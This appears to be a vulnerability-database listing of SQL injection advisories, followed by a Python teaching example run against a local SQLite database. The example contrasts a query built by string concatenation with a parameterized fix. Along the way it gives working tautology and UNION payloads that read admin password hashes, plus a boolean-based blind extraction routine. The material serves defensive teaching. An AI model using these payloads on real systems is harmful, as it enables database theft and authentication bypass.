2820 matches found
SUSE SLES15 / openSUSE 15 Security Update : python-Django (SUSE-SU-2025:4384-1)
The remote SUSE Linux SLES15 / openSUSE 15 host has a package installed that is affected by multiple vulnerabilities as referenced in the SUSE-SU-2025:4384-1 advisory. - CVE-2025-13372: Fixed SQL Injection in FilteredRelation bsc1254437 - CVE-2025-64460: Fixed denial of service via specially...
EUVD-2025-203123
A vulnerability has been found in projectworlds Advanced Library Management System 1.0. Affected by this issue is some unknown functionality of the file /borrowbook.php. Such manipulation of the argument rollnumber leads to sql injection. The attack may be launched remotely. The exploit has been...
CVE-2024-58316 Online Shopping System Advanced 1.0 SQL Injection via Payment Success Parameter
Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the paymentsuccess.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. Attackers can exploit the vulnerability by sending crafted SQL queries to retrieve sensitive database...
CVE-2025-14570
CVE-2025-14570 affects projectworlds Advanced Library Management System 1.0. The vulnerability lies in the route that takes the admin ID (notably /view_admin.php or /view admin.php in variants), where improper handling of the admin_id parameter enables S...
OESA-2025-2851 python-django security update
A high-level Python Web framework that encourages rapid development and clean, pragmatic design. Security Fixes: An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27. FilteredRelation is subject to SQL injection in column aliases, using a suitably crafted...
CVE-2025-14169 FunnelKit – Funnel Builder for WooCommerce Checkout <= 3.13.1.5 - Unauthenticated SQL Injection
The FunnelKit - Funnel Builder for WooCommerce Checkout plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'opid' parameter in all versions up to, and including, 3.13.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on th...
PT-2025-51032
Name of the Vulnerable Software and Affected Versions itsourcecode COVID Tracking System version 1.0 Description A SQL injection issue exists in an unknown functionality of the file '/admin/?page=zone'. The ID argument can be manipulated to exploit this issue, potentially allowing for remote...
Japan Total System Multiple Products SQL Injection Vulnerability
GroupSession Free edition and other products from Japan Total System are enterprise collaboration software. A SQL injection vulnerability exists in various Japan Total System products; it may result in the disclosure or...
CVE-2024-58307 CSZCMS 1.3.0 Authenticated SQL Injection via Members View Endpoint
CSZCMS 1.3.0 contains an authenticated SQL injection vulnerability in the members view functionality that allows authenticated attackers to manipulate database queries. Attackers can inject malicious SQL code through the view parameter to potentially execute time-based blind SQL injection attacks...
CVE-2025-14537
A weakness has been identified in code-projects Class and Exam Timetable Management 1.0. Affected by this issue is some unknown functionality of the file /preview7.php. This manipulation of the argument courseyearsection/semester causes sql injection. Remote exploitation of the attack is possible...
CVE-2025-14527 projectworlds Advanced Library Management System view_book.php sql injection
A weakness has been identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /viewbook.php. Executing a manipulation of the argument bookid can lead to sql injection. The attack can be executed remotely. The exploit has been made...
FreePBX SQL Injection Vulnerability (CNVD-2025-3038208)
FreePBX, formerly known as Asterisk Management Portal, is a set of tools from the FreePBX project for configuring the Asterisk IP telephony system through a web-based GUI. FreePBX suffers from a SQL injection vulnerability that stems from a lack of validation of externally entered S...
CVE-2021-47708
CVE-2021-47708 affects the COMMAX Smart Home System CDP-1020n. A SQL injection in the loginstart.asp id parameter allows an attacker to bypass authentication by sending a crafted POST with malicious id values, manipulating database queries to gain unauthorized access. The Red Hat and EU/NVD-style...
CVE-2025-14255
Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents...
CVE-2025-64081
SQL injection vulnerability in /php/apipatientschedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter...
OpenBMCS SQL Injection Vulnerability
OpenBMCS is a building management and control system from OpenBMCS Australia. OpenBMCS version 2.4 contains a SQL injection vulnerability in the id parameter that could lead to the disclosure of database information...
WordPress Plugin Animation Addons for Elementor Security Vulnerability
WordPress Animation Addons for Elementor plugin is an Elementor page builder extension plugin for the WordPress platform, focused on adding rich animation effects to websites. The WordPress Animation Addons for Elementor plugin suffers from a SQL injection vulnerability that stems from improper...
EUVD-2025-201709
A vulnerability has been found in IdeaCMS up to 1.8. This affects the function whereRaw of the file app/common/logic/index/Coupon.php. Such manipulation of the argument params leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used...
CVE-2025-14217 code-projects Currency Exchange System edittrns.php sql injection
A vulnerability was identified in code-projects Currency Exchange System 1.0. Impacted is an unknown function of the file /edittrns.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used...
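Most entries in this listing (rollnumber, bookid, appointmentID, ID, id, cm, zone ID, admin_id) describe the same defect: a request parameter concatenated straight into a query string. The following is an added example, not code from any of the listed projects or advisories, that reproduces that pattern in Python against an in-memory SQLite database so it can be run offline. The books and admins tables, their rows and the view_book handler are all constructed for illustration; the vulnerable function mirrors a PHP handler of the form "SELECT ... WHERE id = " . $_GET['bookid'], and the hardened function shows the parameterized equivalent. It also shows the boolean-based blind technique that the time-based entries above rely on, using the row/no-row difference as the oracle instead of a delay.

```python
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a books table plus a second table that an
    injected UNION or blind subquery can read from. Not real project data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE books(id INTEGER PRIMARY KEY, title TEXT, status TEXT);
        INSERT INTO books VALUES (1, 'SQL Antipatterns', 'available');
        INSERT INTO books VALUES (2, 'Web Application Security', 'borrowed');
        CREATE TABLE admins(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO admins VALUES (1, 'admin', '$2y$10$constructed-sample-hash');
    """)
    return conn


def view_book_vulnerable(conn: sqlite3.Connection, bookid: str) -> list:
    # Same shape as the vulnerable PHP handlers: the raw parameter becomes
    # part of the SQL text, so it can change the query's structure.
    sql = "SELECT id, title, status FROM books WHERE id = " + bookid
    return conn.execute(sql).fetchall()


def view_book_fixed(conn: sqlite3.Connection, bookid: str) -> list:
    # Validate the type at the edge (an id is a positive integer) and bind
    # the value as a parameter; the driver sends it separately from the SQL,
    # so it can never be parsed as part of the query.
    if not bookid.isdigit():
        raise ValueError("bookid must be a positive integer")
    sql = "SELECT id, title, status FROM books WHERE id = ?"
    return conn.execute(sql, (int(bookid),)).fetchall()


def blind_extract(conn: sqlite3.Connection, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction through the vulnerable handler.

    The oracle is whether the page returns a row: '1 AND <cond>' yields the
    book with id 1 only when <cond> is true. Each character of the subquery's
    result is recovered by testing candidates one at a time."""
    alphabet = string.ascii_lowercase + string.digits + "_"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"1 AND substr(({subquery}),{pos},1)='{ch}'"
            if view_book_vulnerable(conn, payload):
                found += ch
                break
        else:
            break  # no candidate matched: end of the value
    return found


if __name__ == "__main__":
    db = make_db()
    print("normal:", view_book_vulnerable(db, "1"))
    print("tautology:", view_book_vulnerable(db, "1 OR 1=1"))
    print("union:", view_book_vulnerable(
        db, "0 UNION SELECT id, username, password_hash FROM admins"))
    print("blind:", blind_extract(db, "SELECT username FROM admins LIMIT 1"))
    print("fixed:", view_book_fixed(db, "2"))
    try:
        view_book_fixed(db, "1 OR 1=1")
    except ValueError as exc:
        print("fixed rejects payload:", exc)
```

In the PHP applications listed above the equivalent fix is a PDO or mysqli prepared statement with the parameter bound, plus an integer cast or validation before the value reaches the query. Note that binding alone already defeats the payloads here (the string "1 OR 1=1" bound to an integer column simply matches nothing); the explicit type check additionally turns a malformed request into an error you can log and alert on.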